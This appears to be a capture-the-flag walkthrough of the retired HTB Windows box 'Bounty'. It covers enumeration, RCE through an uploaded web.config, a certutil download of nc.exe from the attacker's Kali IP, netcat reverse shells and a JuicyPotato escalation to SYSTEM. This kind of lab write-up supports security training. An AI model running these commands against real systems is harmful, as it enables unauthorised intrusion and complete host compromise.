HTB Walkthrough: Bounty w/o Metasploit (retired)

Bounty is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Bounty| Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# nmap -sC -sV -oA Bounty 10.10.10.93
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–03 11:17 EDT
Nmap scan report for 10.10.10.93
Host is up (0.024s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Running nikto to grab more info.

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# nikto -h 10.10.10.93
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2021–05–03 11:20:07 (GMT-4)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host

Using gobuster to find Aspx, asp files.

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# sudo gobuster dir -t 50 — url http://10.10.10.93 — wordlist /usr/share/wordlists/dirb/big.txt -x aspx,asp 127 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.93
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: aspx,asp
[+] Timeout: 10s
===============================================================
2021/05/03 11:28:36 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 156] [ → http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [ → http://10.10.10.93/uploadedfiles/]

Exploitation

From gobuster, we can upload a file at http://10.10.10.93/transfer.aspx and then view/execute the file at http://10.10.10.93/uploadedfiles/<filename> For test purpose, I uploaded png file and was able to view it successfully.

Let’s use burpsuite to view which extensions are allowed so we can execute code.

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# cat extensions.txt
config
aspx
php
pl
js
html
sh
jsp
cgi
php7

Upload a file at http://10.10.10.93/transfer.aspx and capture that request in Burpsuite and sent it to intruder. We are going to automate requests with different extensions mentioned in ‘extensions.txt’ above. Go to Intruder > Positions. Clear all the symbols. Instead of your file extension, enter ‘<Symbol>EXTENSION<symbol>’

Content-Disposition: form-data; name=”FileUpload1"; filename=”1.§EXTENSION§”

Now upload extensions.txt in burpsuite. Go to Intruder > Payloads > Payload options [Simple list] > Load and upload the extensions.txt file. Click on ‘Start attack’ (verify target in ‘Target’ tab of intruder before starting attack.)

All have status ‘200’ but length is 5 characters short for ‘config’ but it responds back with ‘File Uploaded successfully.’ While others respond as ‘Invalid File. Please try again.’

Let’s try RCE. Google search for ‘web.config rce file upload’ and you will come across ‘https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/'. Let us test if we can execute code remotely. I used this config file which is exact copy of Soroush: https://github.com/ShraddhaMhatre/HTB/blob/main/Webshells/ASPX/test.config . Upload this file at ‘transfer.aspx’ page and visit ‘test.config’ at uploadedFiles folder and you should see ‘3’ executed.

Let us try to execute commands in web.config. Google search for “execute whoami command web.config” and you will find ‘https://lonewolfzero.wordpress.com/2018/05/28/rce-by-uploading-a-web-config-asp/'. Edit the web.config file to execute ‘whoami’ command and you will see ‘merlin’ user displayed.

The web.config file to execute ‘whoami’ can be found here: https://github.com/ShraddhaMhatre/HTB/blob/main/Webshells/ASPX/whoami.config and is referred from lonewolfzero’s article.

We will upload and execute nc.exe for reverse shell
1) Find a temp folder:
Set cmd1 = objShell.Exec(“cmd /c dir c:\windows\temp”)
2) Upload nc.exe
Set cmd1 = objShell.Exec(“cmd /c certutil -urlcache -split -f http://<Kali IP>:8000/nc.exe c:\windows\temp\nc.exe”)
You will get response for this web.config as:

3) Verify if file is present
Set cmd1 = objShell.Exec(“cmd /c dir c:\windows\temp”)
4) Execute nc.exe
Set cmd1 = objShell.Exec(“cmd /c c:\windows\temp\nc.exe <Kali IP> 9877 -e cmd”)

And you will get reverse shell at ‘c:\Users\merlin\Desktop>’. The file is hidden, use ‘dir /a’ command. [Note: Try to make a habit of using ‘ls -a’ and ‘dir /a’].

Privilege Escalation

Checking privileges for potatoes

c:\Users>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
— — — — — — — — — — —

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

It is vulnerable to JuicyPotato. For more info refer: https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html

In order to perform reverse shell, google search for “juicy potato reverse shell” and you will come across https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato

Transfer JuicyPotato.exe from kali to target m/c. Open a netcat session in kali (port 9876) and execute below command:
c:\Windows\Temp>JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a “/c c:\windows\temp\nc.exe -e cmd.exe <Kali IP> 9876” -t *
JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a “/c c:\windows\temp\nc.exe -e cmd.exe <Kali IP> 9876” -t *
Testing {4991d34b-80a1–4291–83b6–3328366b9097} 1337
….
[+] authresult 0
{4991d34b-80a1–4291–83b6–3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

You will get reverse shell + flag.